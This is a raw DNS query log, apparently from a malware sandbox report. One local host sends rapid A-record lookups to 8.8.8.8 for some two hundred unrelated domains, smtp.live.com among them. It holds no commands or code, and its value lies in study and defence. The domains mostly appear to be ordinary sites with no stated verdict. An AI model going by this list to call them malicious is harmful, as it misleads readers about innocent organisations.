                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.028107882 CEST192.168.2.48.8.8.80xf6c0Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.082853079 CEST192.168.2.48.8.8.80xb1Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.086328983 CEST192.168.2.48.8.8.80x956cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.154540062 CEST192.168.2.48.8.8.80x5145Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.163742065 CEST192.168.2.48.8.8.80x7800Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.224006891 CEST192.168.2.48.8.8.80x532cStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.251533985 CEST192.168.2.48.8.8.80xcb22Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.331717014 CEST192.168.2.48.8.8.80x46b1Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.344295025 CEST192.168.2.48.8.8.80x8d31Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.348396063 CEST192.168.2.48.8.8.80x6891Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.351881027 CEST192.168.2.48.8.8.80xf58dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.366847992 CEST192.168.2.48.8.8.80xd490Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.453893900 CEST192.168.2.48.8.8.80x79d9Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.456671000 CEST192.168.2.48.8.8.80xd63cStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.462419033 CEST192.168.2.48.8.8.80x4ec6Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.502285004 CEST192.168.2.48.8.8.80x63fcStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.509901047 CEST192.168.2.48.8.8.80xd9afStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.511074066 CEST192.168.2.48.8.8.80x2d7dStandard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.514031887 CEST192.168.2.48.8.8.80x376eStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.516041994 CEST192.168.2.48.8.8.80x3f30Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.625029087 CEST192.168.2.48.8.8.80x2851Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.630002022 CEST192.168.2.48.8.8.80x96f8Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.664226055 CEST192.168.2.48.8.8.80x6aabStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.671288013 CEST192.168.2.48.8.8.80x5ae4Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.672930956 CEST192.168.2.48.8.8.80x401fStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.686273098 CEST192.168.2.48.8.8.80xdbccStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.690244913 CEST192.168.2.48.8.8.80x6e08Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.691706896 CEST192.168.2.48.8.8.80x413cStandard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.738714933 CEST192.168.2.48.8.8.80xb24dStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.772810936 CEST192.168.2.48.8.8.80xd02bStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.784472942 CEST192.168.2.48.8.8.80x9e56Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.808378935 CEST192.168.2.48.8.8.80xf6adStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.845340967 CEST192.168.2.48.8.8.80xa5c6Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:07.880990028 CEST192.168.2.48.8.8.80x2634Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.037909985 CEST192.168.2.48.8.8.80xe95fStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.133193970 CEST192.168.2.48.8.8.80x956cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.147943974 CEST192.168.2.48.8.8.80x8a2fStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.154194117 CEST192.168.2.48.8.8.80x96f3Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.204750061 CEST192.168.2.48.8.8.80x3e72Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.260715961 CEST192.168.2.48.8.8.80x241cStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.300184965 CEST192.168.2.48.8.8.80x341Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.347909927 CEST192.168.2.48.8.8.80x7d45Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.414263964 CEST192.168.2.48.8.8.80xaa70Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.525414944 CEST192.168.2.48.8.8.80xbc12Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.559478045 CEST192.168.2.48.8.8.80x74ecStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.650217056 CEST192.168.2.48.8.8.80x50f0Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.796885967 CEST192.168.2.48.8.8.80x4971Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.800090075 CEST192.168.2.48.8.8.80x3fc9Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.809807062 CEST192.168.2.48.8.8.80xe689Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.903016090 CEST192.168.2.48.8.8.80x755eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.905533075 CEST192.168.2.48.8.8.80x6998Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:08.986639023 CEST192.168.2.48.8.8.80x7942Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.098645926 CEST192.168.2.48.8.8.80x3c74Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.171730042 CEST192.168.2.48.8.8.80x8645Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.206859112 CEST192.168.2.48.8.8.80x2e8fStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.209115028 CEST192.168.2.48.8.8.80x956cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.266719103 CEST192.168.2.48.8.8.80x81feStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.317941904 CEST192.168.2.48.8.8.80xda39Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.320327044 CEST192.168.2.48.8.8.80x40d4Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.326122999 CEST192.168.2.48.8.8.80xfe20Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.380322933 CEST192.168.2.48.8.8.80x6bceStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.450964928 CEST192.168.2.48.8.8.80x7d45Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.470593929 CEST192.168.2.48.8.8.80xb74Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.486473083 CEST192.168.2.48.8.8.80x7299Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.591120005 CEST192.168.2.48.8.8.80x515eStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.742557049 CEST192.168.2.48.8.8.80xa0deStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.813517094 CEST192.168.2.48.8.8.80xd811Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.816353083 CEST192.168.2.48.8.8.80xf065Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:09.950645924 CEST192.168.2.48.8.8.80x2c66Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.004403114 CEST192.168.2.48.8.8.80x4b1bStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.035635948 CEST192.168.2.48.8.8.80xbfdStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.043519974 CEST192.168.2.48.8.8.80xa3f8Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.078448057 CEST192.168.2.48.8.8.80x5048Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.209425926 CEST192.168.2.48.8.8.80x9dfStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.288419962 CEST192.168.2.48.8.8.80xe848Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.336407900 CEST192.168.2.48.8.8.80x889eStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.395490885 CEST192.168.2.48.8.8.80x45e5Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.403641939 CEST192.168.2.48.8.8.80xa026Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.477116108 CEST192.168.2.48.8.8.80x7d45Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.597914934 CEST192.168.2.48.8.8.80xe7adStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.600246906 CEST192.168.2.48.8.8.80x6b42Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.697576046 CEST192.168.2.48.8.8.80xdbbStandard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.930488110 CEST192.168.2.48.8.8.80x96b9Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.953706026 CEST192.168.2.48.8.8.80x7acfStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:10.957669020 CEST192.168.2.48.8.8.80x30baStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.059525013 CEST192.168.2.48.8.8.80xff9dStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.071616888 CEST192.168.2.48.8.8.80xcce7Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.082020044 CEST192.168.2.48.8.8.80xaf5Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.304045916 CEST192.168.2.48.8.8.80x956cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.374356985 CEST192.168.2.48.8.8.80xa229Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.378206968 CEST192.168.2.48.8.8.80xdcecStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.394428015 CEST192.168.2.48.8.8.80xae11Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.601367950 CEST192.168.2.48.8.8.80xf386Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.625504017 CEST192.168.2.48.8.8.80xd687Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.695343018 CEST192.168.2.48.8.8.80xbbbdStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.700740099 CEST192.168.2.48.8.8.80x7fe3Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.743333101 CEST192.168.2.48.8.8.80x402aStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.860835075 CEST192.168.2.48.8.8.80x3978Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.863871098 CEST192.168.2.48.8.8.80xeb5fStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.863872051 CEST192.168.2.48.8.8.80x2890Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.864443064 CEST192.168.2.48.8.8.80x187Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.864592075 CEST192.168.2.48.8.8.80x8759Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.866545916 CEST192.168.2.48.8.8.80x14e2Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.906327963 CEST192.168.2.48.8.8.80x7402Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.911148071 CEST192.168.2.48.8.8.80xec00Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:11.960568905 CEST192.168.2.48.8.8.80x97c6Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.002553940 CEST192.168.2.48.8.8.80xfb62Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.004535913 CEST192.168.2.48.8.8.80xaecdStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.080468893 CEST192.168.2.48.8.8.80xeb8bStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.126873970 CEST192.168.2.48.8.8.80xcd4fStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.129717112 CEST192.168.2.48.8.8.80xab22Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.129718065 CEST192.168.2.48.8.8.80x95e4Standard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.166616917 CEST192.168.2.48.8.8.80x13efStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.210608006 CEST192.168.2.48.8.8.80x69abStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.255260944 CEST192.168.2.48.8.8.80xf2d5Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.256560087 CEST192.168.2.48.8.8.80x2e35Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.382659912 CEST192.168.2.48.8.8.80x7310Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.474623919 CEST192.168.2.48.8.8.80xbe24Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.532629967 CEST192.168.2.48.8.8.80x7d45Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.602688074 CEST192.168.2.48.8.8.80x78d9Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.640911102 CEST192.168.2.48.8.8.80xfeb9Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.768768072 CEST192.168.2.48.8.8.80xd581Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.864686012 CEST192.168.2.48.8.8.80x8988Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.942955971 CEST192.168.2.48.8.8.80x2cd8Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.973998070 CEST192.168.2.48.8.8.80xf678Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.994024038 CEST192.168.2.48.8.8.80xe13eStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:12.998073101 CEST192.168.2.48.8.8.80x80acStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.002048016 CEST192.168.2.48.8.8.80xe779Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.052712917 CEST192.168.2.48.8.8.80xd920Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.052799940 CEST192.168.2.48.8.8.80xda05Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.053674936 CEST192.168.2.48.8.8.80x7d7eStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.223928928 CEST192.168.2.48.8.8.80xa22eStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.333777905 CEST192.168.2.48.8.8.80x8f48Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.334254980 CEST192.168.2.48.8.8.80x3fa5Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.353354931 CEST192.168.2.48.8.8.80x5aebStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.359391928 CEST192.168.2.48.8.8.80x28ddStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.393455029 CEST192.168.2.48.8.8.80x425eStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.450373888 CEST192.168.2.48.8.8.80x7535Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.615909100 CEST192.168.2.48.8.8.80xfc2eStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.616099119 CEST192.168.2.48.8.8.80xe9d6Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.710042000 CEST192.168.2.48.8.8.80xfd48Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.711509943 CEST192.168.2.48.8.8.80xfeb9Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.723279953 CEST192.168.2.48.8.8.80x34fdStandard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.752888918 CEST192.168.2.48.8.8.80x5c76Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.787134886 CEST192.168.2.48.8.8.80x2a09Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.792023897 CEST192.168.2.48.8.8.80xc625Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.864397049 CEST192.168.2.48.8.8.80x316cStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.864638090 CEST192.168.2.48.8.8.80xfd17Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.864886999 CEST192.168.2.48.8.8.80xaf0eStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.872704029 CEST192.168.2.48.8.8.80xd2e1Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.880517960 CEST192.168.2.48.8.8.80x314aStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.918881893 CEST192.168.2.48.8.8.80x413cStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.921655893 CEST192.168.2.48.8.8.80x997eStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.036819935 CEST192.168.2.48.8.8.80xb81eStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.052793026 CEST192.168.2.48.8.8.80xe4b4Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.080832958 CEST192.168.2.48.8.8.80x80acStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.123843908 CEST192.168.2.48.8.8.80xacd8Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.160758018 CEST192.168.2.48.8.8.80xb7a5Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.210915089 CEST192.168.2.48.8.8.80x4fd6Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.217423916 CEST192.168.2.48.8.8.80xf958Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.224567890 CEST192.168.2.48.8.8.80xac50Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.239312887 CEST192.168.2.48.8.8.80x3223Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.265892982 CEST192.168.2.48.8.8.80xba6Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.291299105 CEST192.168.2.48.8.8.80xbb72Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.350553036 CEST192.168.2.48.8.8.80xa4efStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.396760941 CEST192.168.2.48.8.8.80x3bfbStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.480673075 CEST192.168.2.48.8.8.80x5ac4Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.480673075 CEST192.168.2.48.8.8.80x1229Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.486895084 CEST192.168.2.48.8.8.80xfaceStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.488806963 CEST192.168.2.48.8.8.80x9026Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.533370018 CEST192.168.2.48.8.8.80x64aeStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.552285910 CEST192.168.2.48.8.8.80x840Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.591193914 CEST192.168.2.48.8.8.80x4dbaStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.596823931 CEST192.168.2.48.8.8.80x313dStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.596823931 CEST192.168.2.48.8.8.80xce2dStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.645751953 CEST192.168.2.48.8.8.80x9029Standard query (0)fundeo.comA (IP address)IN (0x0001)false
